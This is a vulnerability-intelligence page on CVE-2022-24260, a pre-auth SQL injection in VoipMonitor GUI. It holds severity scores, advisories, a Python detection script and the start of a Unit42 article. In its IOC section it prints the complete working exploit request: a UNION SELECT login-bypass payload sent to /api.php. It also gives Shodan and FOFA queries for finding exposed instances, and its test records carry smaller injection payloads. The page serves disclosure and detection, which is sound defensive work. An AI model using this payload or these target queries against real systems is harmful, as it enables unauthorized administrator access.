CVE-2022-24260
Published: 2022-02-04
CVE-2022-24260: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Priority: P1 · 85 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 50.93% (98.8th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| voipmonitor | voipmonitor | < 24.96 | 24.96 |
Detection & IOCs (extracted from sources)
url: /api.php
command: module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
- Detect exploitation attempts by monitoring POST requests to /api.php that carry the 'module=relogin' and 'action=login' parameters together with a UNION SELECT SQL injection payload in the 'user' field.
- A successful exploitation response returns HTTP status 200 with a body containing '"success":true', '_vm_version' and '_debug'.
- Exposed VoipMonitor instances can be identified via the Shodan query 'http.title:"VoIPmonitor"' or the FOFA query 'title="voipmonitor"'; such instances are potential targets for this pre-auth SQL injection.
- The exploit POST request to /api.php uses the Content-Type header 'application/x-www-form-urlencoded'; monitor for anomalous UNION SELECT payloads in form-encoded login requests.
- The vulnerability affects VoipMonitor GUI versions before v24.96 only; patched instances (v24.96 and later) are not vulnerable.
- The UNION SELECT payload uses 92 columns; the exact column count may vary if the underlying database schema differs across deployments, potentially requiring payload adjustment.
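The detection notes above can be turned into a small triage routine: a request is an exploitation attempt when it is a form-encoded POST to /api.php with module=relogin and action=login and a UNION SELECT in the 'user' field, and the attempt counts as successful when the response is a 200 whose body carries '"success":true', '_vm_version' and '_debug'. The code below is an added example written for this page, not VoipMonitor code or a published detection rule; the request/response records, their field names and the response bodies are constructed for the example, and the version check only encodes the "< 24.96" range from the table above.

```python
"""Added example: triage VoipMonitor GUI login traffic for CVE-2022-24260
exploitation attempts. Record layout, field names and the sample records
are constructed assumptions for this example, not VoipMonitor's own format."""
import re
from urllib.parse import parse_qs

# UNION SELECT in a decoded form field; tolerates whitespace, '+' and
# inline /**/ comments between the keywords, and an optional ALL.
UNION_SELECT_RE = re.compile(
    r"\bunion(?:\s|\+|/\*.*?\*/)+(?:all(?:\s|\+|/\*.*?\*/)+)?select\b",
    re.IGNORECASE,
)


def is_vulnerable_version(version: str) -> bool:
    """GUI versions before 24.96 are affected; 24.96 and later are fixed."""
    major, minor = (int(p) for p in version.split(".")[:2])
    return (major, minor) < (24, 96)


def is_exploit_attempt(method: str, path: str, content_type: str, body: str) -> bool:
    """POST /api.php, form-encoded, module=relogin&action=login, UNION SELECT in 'user'."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/api.php":
        return False
    if "application/x-www-form-urlencoded" not in content_type.lower():
        return False
    params = parse_qs(body, keep_blank_values=True)  # decodes '+' and %XX
    if params.get("module") != ["relogin"] or params.get("action") != ["login"]:
        return False
    user = params.get("user", [""])[0]
    return UNION_SELECT_RE.search(user) is not None


def is_successful_response(status: int, resp_body: str) -> bool:
    """Success indicators taken from the detection notes on this page."""
    return (
        status == 200
        and '"success":true' in resp_body
        and "_vm_version" in resp_body
        and "_debug" in resp_body
    )


def triage(records):
    """Map each record id to 'benign', 'exploit-attempt' or 'exploit-success'."""
    verdicts = {}
    for r in records:
        if not is_exploit_attempt(r["method"], r["path"], r["content_type"], r["body"]):
            verdicts[r["id"]] = "benign"
        elif is_successful_response(r["status"], r["resp_body"]):
            verdicts[r["id"]] = "exploit-success"
        else:
            verdicts[r["id"]] = "exploit-attempt"
    return verdicts


# Constructed sample traffic: a normal login, a forged login that succeeded,
# a comment-obfuscated attempt that errored out, and a GET with the same parameters.
SAMPLE_RECORDS = [
    {"id": 1, "method": "POST", "path": "/api.php",
     "content_type": "application/x-www-form-urlencoded",
     "body": "module=relogin&action=login&pass=secret&user=alice",
     "status": 200, "resp_body": '{"success":false}'},
    {"id": 2, "method": "POST", "path": "/api.php",
     "content_type": "application/x-www-form-urlencoded",
     "body": "module=relogin&action=login&pass=nope&user=a'+UNION+SELECT+'admin','admin',null,1--+",
     "status": 200, "resp_body": '{"success":true,"_vm_version":"24.90","_debug":""}'},
    {"id": 3, "method": "POST", "path": "/api.php",
     "content_type": "application/x-www-form-urlencoded",
     "body": "module=relogin&action=login&pass=nope&user=a'/**/UNION/**/ALL/**/SELECT/**/1",
     "status": 500, "resp_body": "error"},
    {"id": 4, "method": "GET",
     "path": "/api.php?module=relogin&action=login&user=a'+UNION+SELECT+1",
     "content_type": "", "body": "", "status": 200, "resp_body": ""},
]

if __name__ == "__main__":
    for rid, verdict in triage(SAMPLE_RECORDS).items():
        print(rid, verdict)
```

Record 4 is deliberately classified as benign because the page's indicator is specific to POST bodies; if a deployment accepts the same parameters on GET, widen the method check rather than the payload pattern. The version check is the first thing to run against an inventory: anything reporting a GUI version below 24.96 should be patched regardless of whether the log search finds attempts.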
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |
GHSA
GHSA-655g-pxvh-gr5j · ghsa_unreviewed · 2022-02-09 · CVE-2022-24260 [CRITICAL] · CWE-89
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
VulnCheck
voipmonitor voipmonitor: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck · 2022 · CVSS 9.8 · CVE-2022-24260 [CRITICAL]
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Affected: vendor voipmonitor, product voipmonitor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2022-24260
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2022-2426
No detection rules found.
Nuclei
VoipMonitor - Pre-Auth SQL Injection
nuclei · CVSS 9.8 · CVE-2022-24260 [CRITICAL]
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Template:
```yaml
id: CVE-2022-24260

info:
  name: VoipMonitor - Pre-Auth SQL Injection
  author: gy741
  severity: critical
  description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.
  reference:
    - https://kerbit.io/research/read/
```
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42 · 2022-08-19 · CVSS 8.8 · CVE-2021-20166 [HIGH]
Author: Yue Guan · Published: August 19, 2022
Tags: Trend Reports, Vulnerabilities, Attack analysis, Exploit in the wild, Network security trends
CVEs covered: CVE-2021-20166, CVE-2021-20167, CVE-2021-21881, CVE-2021-24762, CVE-2021-28169, CVE-2021-31589, CVE-2021-39226, CVE-2021-4045, CVE-2021-43711, CVE-2022-21371, CVE-2022-21662, CVE-2022-22536, CVE-2022-22947, CVE-2022-22954, CVE-2022-22963, CVE-2022-22965, CVE-2022-24112, CVE-2022-24260, CVE-2022-25060, CVE-2022-25075, CVE-2022-25134, CVE-2022-27226, CVE-2022-29464
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ